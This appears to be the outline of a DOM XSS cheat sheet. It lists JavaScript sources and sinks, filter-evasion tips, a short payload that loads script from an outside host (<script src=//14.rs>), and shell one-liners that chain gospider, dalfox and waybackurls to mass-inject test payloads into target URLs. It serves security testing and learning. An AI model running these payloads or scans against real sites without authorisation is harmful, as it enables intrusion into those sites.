- Credits
  - Somdev Sangwan (@s0md3v) for the awesome tips and tricks.
  - domxsswiki for the awesome list of sinks and sources.
- Table of contents
- Sources
  - document.URL
  - document.documentURI
  - document.URLUnencoded (IE 5.5 or later only)
  - document.baseURI
  - location
  - location.href
  - location.search
  - location.hash
  - location.pathname
  - document.cookie
  - document.referrer
  - window.name
  - history.pushState()
  - history.replaceState()
  - localStorage
  - sessionStorage
- Sinks
  - eval
  - Function
  - setTimeout
  - setInterval
  - setImmediate
  - execScript
  - crypto.generateCRMFRequest
  - ScriptElement.src
  - ScriptElement.text
  - ScriptElement.textContent
  - ScriptElement.innerText
  - anyTag.onEventName
  - document.write
  - document.writeln
  - anyElement.innerHTML
  - Range.createContextualFragment
  - window.location
  - document.location
- Q: How to identify sinks and sources?
  A: Use the browser extension Untrusted Types by filedescriptor.
- Tips and Tricks (@s0md3v)
  - http(s):// can be shortened to // or /\ or \.
  - document.cookie can be shortened to cookie. It applies to other DOM objects as well.
  - alert and other pop-up functions don't need a value, so stop doing alert('XSS') and start doing alert().
  - You can use // to close a tag instead of >.
  - I have found that confirm is the least detected pop-up function, so stop using alert.
  - Quotes around an attribute value aren't necessary as long as the value doesn't contain spaces. You can use <script src=//14.rs> instead of <script src="//14.rs">.
  - The shortest HTML context XSS payload is <script src=//14.rs> (19 chars).
- Scanning XSS from host / from @cihanmehmet
  gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}' | grep "=" | qsreplace -a | dalfox pipe | tee result.txt
- Automating XSS using Dalfox, Gf and Waybackurls / from @theinfosecguy
  cat test.txt | gf xss | sed 's/=.*/=/' | sed 's/URL: //' | tee testxss.txt ; dalfox file testxss.txt -b yours-xss-hunter-domain (e.g. yours.xss.ht)
- XSS without Gf / from @HacktifyS
  waybackurls testphp.vulnweb.com | grep '=' | qsreplace '"><script>alert(1)</script>' | while read host; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo -e "$host \033[0;31mVulnerable\033[0m"; done
- XSS test beds and challenges
- Amazing tools
- XSS weaponized payloads